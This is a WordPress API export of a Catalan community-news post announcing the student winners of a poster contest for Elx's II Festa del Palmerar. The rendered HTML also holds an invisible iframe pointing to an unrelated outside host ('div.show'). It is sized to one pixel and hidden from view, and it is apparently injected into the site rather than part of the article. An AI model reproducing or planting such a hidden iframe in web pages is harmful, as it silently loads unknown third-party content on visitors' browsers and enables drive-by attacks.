{"id":7791,"date":"2023-12-03T17:26:00","date_gmt":"2023-12-03T17:26:00","guid":{"rendered":"https:\/\/raval.es\/elx\/?p=7791"},"modified":"2024-10-14T12:55:25","modified_gmt":"2024-10-14T12:55:25","slug":"motiucartell2fp","status":"publish","type":"post","link":"https:\/\/raval.es\/elx\/motiucartell2fp\/","title":{"rendered":"Cartell II Festa Palmerar"},"content":{"rendered":"<div id=\"fb-root\"><\/div>\n<p>[et_pb_section fb_built=\u00bb1&#8243; _builder_version=\u00bb4.18.0&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_row column_structure=\u00bb3_5,2_5&#8243; _builder_version=\u00bb4.18.0&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_column type=\u00bb3_5&#8243; _builder_version=\u00bb4.18.0&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_image src=\u00bbhttps:\/\/raval.es\/elx\/wp-content\/uploads\/2024\/10\/elcorpalmerar.jpg\u00bb title_text=\u00bbelcorpalmerar\u00bb _builder_version=\u00bb4.18.0&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb][\/et_pb_image][et_pb_image src=\u00bbhttps:\/\/raval.es\/elx\/wp-content\/uploads\/2024\/10\/53375202544_0c80089949_c.jpg\u00bb title_text=\u00bb53375202544_0c80089949_c\u00bb url=\u00bbhttp:\/\/www.volempalmerar.es\/lucesysombras3\/\u00bb _builder_version=\u00bb4.18.0&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb][\/et_pb_image][\/et_pb_column][et_pb_column type=\u00bb2_5&#8243; _builder_version=\u00bb4.18.0&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_image src=\u00bbhttps:\/\/raval.es\/elx\/wp-content\/uploads\/2024\/10\/cartellcor2.jpg\u00bb title_text=\u00bbcartellcor2&#8243; _builder_version=\u00bb4.18.0&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb][\/et_pb_image][et_pb_text _builder_version=\u00bb4.18.0&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb]<\/p>\n<p>.A la II Festa del Palmera es va fer entrega dels premis a les alumnes guanyadores del concurs per elegir el motiu central del cartell i publicitat de la festa.<\/p>\n<p><strong>Aitana Sansano Coves i Christel Mart\u00ednez Zapata<\/strong> alumnes de 1er de Batxillerat de l&#8217;IES Misteri d&#8217;Elx varen ser les premiades, respectivament, amb el primer premi i acc\u00e9sit, a m\u00e9s de la publicaciu\u00f3 de l&#8217;obra guanyadora (\u00abel Cor del palmerar\u00bb) en les publicacions de la II Festa del Palmerar.<\/p>\n<p>El Concurs va ser promogut per l&#8217;organitzaci\u00f3 de la festa i patrocinant per l&#8217;\u00e0rea de Joventut de la Diputaci\u00f3 d&#8217;Alacant dins del projecte Fem Barri del Club Jove Raval<\/p>\n<p>&nbsp;<\/p>\n<p><em><\/em><\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][et_pb_row _builder_version=\u00bb4.18.0&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_column type=\u00bb4_4&#8243; _builder_version=\u00bb4.18.0&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_text _builder_version=\u00bb4.18.0&#8243; _module_preset=\u00bbdefault\u00bb hover_enabled=\u00bb0&#8243; global_colors_info=\u00bb{}\u00bb sticky_enabled=\u00bb0&#8243;]<\/p>\n<p style=\"text-align: justify;\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/raval.es\/elx\/wp-content\/uploads\/2024\/10\/clubjovelogo-300x128.png\" width=\"180\" height=\"128\" alt=\"\" class=\"wp-image-7798 alignnone size-medium\" \/><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/raval.es\/elx\/wp-content\/uploads\/2023\/11\/festapalmerar23-web-300x150.jpg\" width=\"180\" height=\"150\" alt=\"\" class=\"wp-image-6881 alignnone size-medium\" \/><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/raval.es\/elx\/wp-content\/uploads\/2021\/11\/Diputacion-AREA-JUVENTUD-300x150.png\" width=\"180\" height=\"150\" alt=\"\" class=\"wp-image-5156 alignnone size-medium\" \/><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/raval.es\/elx\/wp-content\/uploads\/2023\/09\/AjuntamentdElx-300x90.png\" width=\"250\" height=\"90\" alt=\"\" class=\"wp-image-6655 alignnone size-medium\" \/><\/p>\n<div style=\"text-align: justify;\"><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Aitana i Christel, guanyadores del concurs del motiu del cartell de la II festa del palmerar<\/p>\n","protected":false},"author":1,"featured_media":7792,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","_joinchat":[],"footnotes":""},"categories":[51],"tags":[],"class_list":["post-7791","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noticias"],"_links":{"self":[{"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/posts\/7791","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/comments?post=7791"}],"version-history":[{"count":5,"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/posts\/7791\/revisions"}],"predecessor-version":[{"id":7813,"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/posts\/7791\/revisions\/7813"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/media\/7792"}],"wp:attachment":[{"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/media?parent=7791"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/categories?post=7791"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/tags?post=7791"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}